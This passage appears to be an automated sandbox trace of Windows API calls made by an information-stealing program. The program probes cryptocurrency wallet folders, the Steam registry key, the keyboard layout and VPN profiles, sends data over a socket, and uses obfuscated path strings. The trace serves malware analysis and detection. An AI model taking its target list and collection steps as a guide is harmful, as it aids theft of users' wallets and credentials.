lpOldMode=0x19f29c) returned 1 [0267.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x2c [0267.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory\\", lpFilePart=0x0) returned 0x2d [0267.490] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory\\*.wallet" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\armory\\*.wallet"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.493] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.493] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\atomic", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic") returned 0x2d [0267.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x2c [0267.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x2c [0267.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\", lpFilePart=0x0) returned 0x2d [0267.493] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\*"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.495] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.495] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Binance", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance") returned 0x2e [0267.495] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2d [0267.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.496] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2d [0267.496] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\", lpFilePart=0x0) returned 0x2e [0267.496] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\*app-store*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\binance\\*app-store*"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.498] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x24 [0267.498] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%\\Coinomi\\Coinomi\\Cache", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache") returned 0x3a [0267.498] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache", lpFilePart=0x0) returned 0x39 [0267.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.498] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache", lpFilePart=0x0) returned 0x39 [0267.498] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache\\", lpFilePart=0x0) returned 0x3a [0267.498] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\Cache\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\cache\\*"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.499] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x24 [0267.500] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%\\Coinomi\\Coinomi\\db", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db") returned 0x37 [0267.500] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db", lpFilePart=0x0) returned 0x36 [0267.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.500] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db", lpFilePart=0x0) returned 0x36 [0267.500] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db\\", lpFilePart=0x0) returned 0x37 [0267.500] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\db\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\db\\*"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.501] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x24 [0267.501] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%\\Coinomi\\Coinomi\\wallets", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets") returned 0x3c [0267.501] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets", lpFilePart=0x0) returned 0x3b [0267.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets", lpFilePart=0x0) returned 0x3b [0267.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\", lpFilePart=0x0) returned 0x3c [0267.502] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets\\*"), lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.503] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.503] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Electrum\\wallets", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets") returned 0x37 [0267.503] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x36 [0267.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.507] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.507] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Ethereum\\wallets", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\wallets") returned 0x37 [0267.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.508] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.509] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus\\exodus.wallet", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet") returned 0x3b [0267.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.510] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.510] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus") returned 0x2d [0267.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.514] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.514] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Guarda", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Guarda") returned 0x2d [0267.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.516] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.516] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\com.liberty.jaxx", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\com.liberty.jaxx") returned 0x37 [0267.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.517] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.517] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents\\Monero\\wallets", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\Documents\\Monero\\wallets") returned 0x2f [0267.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f29c) returned 1 [0267.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0267.520] CoCreateGuid (in: pguid=0x19efcc | out: pguid=0x19efcc*(Data1=0x162cafd4, Data2=0x7d1e, Data3=0x4f7e, Data4=([0]=0xb7, [1]=0x3b, [2]=0xb0, [3]=0x1c, [4]=0x90, [5]=0xba, [6]=0x92, [7]=0x22))) returned 0x0 [0267.520] CoCreateGuid (in: pguid=0x19eefc | out: pguid=0x19eefc*(Data1=0xe20dc3, Data2=0xbf68, Data3=0x4293, Data4=([0]=0x8b, [1]=0xa1, [2]=0x49, [3]=0xdd, [4]=0xc7, [5]=0xe1, [6]=0x3d, [7]=0x98))) returned 0x0 [0267.521] send (s=0x348, buf=0x211a2ef*, len=162, flags=0) returned 162 [0267.523] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 128 [0267.571] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Valve\\Steam", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f278 | out: phkResult=0x19f278*=0x0) returned 0x2 [0267.573] CoCreateGuid (in: pguid=0x19efd0 | out: pguid=0x19efd0*(Data1=0x3b301c49, Data2=0x9c95, Data3=0x4fcc, Data4=([0]=0xa4, [1]=0x2d, [2]=0xef, [3]=0x69, [4]=0xf, [5]=0x45, [6]=0x9e, [7]=0x3b))) returned 0x0 [0267.573] CoCreateGuid (in: pguid=0x19ef00 | out: pguid=0x19ef00*(Data1=0xce0c5bfa, Data2=0x5ac9, Data3=0x4f39, Data4=([0]=0x9c, [1]=0x77, [2]=0x9a, [3]=0x82, [4]=0x71, [5]=0x6f, [6]=0x36, [7]=0xdb))) returned 0x0 [0267.573] send (s=0x348, buf=0x211a2ef*, len=162, flags=0) returned 162 [0267.579] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 128 [0267.648] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0267.649] GetKeyboardLayoutList (in: nBuff=1, lpList=0x2263ee0 | out: lpList=0x2263ee0) returned 1 [0267.676] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0xe4f3234d, Data2=0xadce, Data3=0x4ff8, Data4=([0]=0xad, [1]=0x4f, [2]=0xed, [3]=0x25, [4]=0xf4, [5]=0xc2, [6]=0x20, [7]=0xbf))) returned 0x0 [0267.676] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x13850b9d, Data2=0xe4ad, Data3=0x439d, Data4=([0]=0x89, [1]=0x3c, [2]=0x8f, [3]=0xb5, [4]=0xa8, [5]=0x83, [6]=0x3c, [7]=0x56))) returned 0x0 [0267.677] send (s=0x348, buf=0x211a2ef*, len=198, flags=0) returned 198 [0267.678] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 125 [0267.987] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f19c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.987] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local", lpDst=0x19f19c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x24 [0267.988] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN", nBufferLength=0x105, lpBuffer=0x19ede0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN", lpFilePart=0x0) returned 0x2b [0267.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f27c) returned 1 [0267.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x2264d4c | out: lpFileInformation=0x2264d4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0267.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f278) returned 1 [0267.992] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0xad441349, Data2=0xb5a1, Data3=0x4856, Data4=([0]=0xac, [1]=0xa5, [2]=0x63, [3]=0xda, [4]=0xcb, [5]=0x40, [6]=0x5, [7]=0xae))) returned 0x0 [0267.993] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0xa56240c2, Data2=0x453d, Data3=0x4a32, Data4=([0]=0xb8, [1]=0x23, [2]=0xec, [3]=0xc8, [4]=0xd3, [5]=0x65, [6]=0x6f, [7]=0xa2))) returned 0x0 [0267.993] send (s=0x348, buf=0x211a2ef*, len=178, flags=0) returned 178 [0267.994] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 128 [0268.059] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%", lpDst=0x19f170, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%") returned 0x18 [0268.059] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng", lpDst=0x19f170, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng") returned 0x3c [0268.142] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x19edec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x54 [0268.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f2a0) returned 1 [0268.143] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x19eda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x54 [0268.143] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\", nBufferLength=0x105, lpBuffer=0x19ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\", lpFilePart=0x0) returned 0x55 [0268.143] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\*ovpn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x19efc8 | out: lpFindFileData=0x19efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0268.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f264) returned 1 [0268.149] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x1f09cca3, Data2=0x4e87, Data3=0x4414, Data4=([0]=0x9d, [1]=0x92, [2]=0x94, [3]=0x13, [4]=0xf0, [5]=0xbe, [6]=0x9a, [7]=0xee))) returned 0x0 [0268.149] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x5e25ca42, Data2=0xcf31, Data3=0x4c47, Data4=([0]=0x90, [1]=0x8b, [2]=0x3b, [3]=0x8d, [4]=0x36, [5]=0x23, [6]=0x8e, [7]=0x3e))) returned 0x0 [0268.149] send (s=0x348, buf=0x211a2ef*, len=167, flags=0) returned 167 [0268.150] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 129 [0268.192] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%", lpDst=0x19f17c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%") returned 0x28 [0268.192] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x19f17c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Exte\x19ʌ") returned 0x6a [0268.193] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x19f170, nSize=0x6a | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl") returned 0x6a [0268.193] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x19edec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x43 [0268.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f2a0) returned 1 [0268.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x19eda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x43 [0268.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\", nBufferLength=0x105, lpBuffer=0x19ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\", lpFilePart=0x0) returned 0x44 [0268.194] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\*ovpn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x19efc8 | out: lpFindFileData=0x19efc8*(dwFileAttributes=0x0, 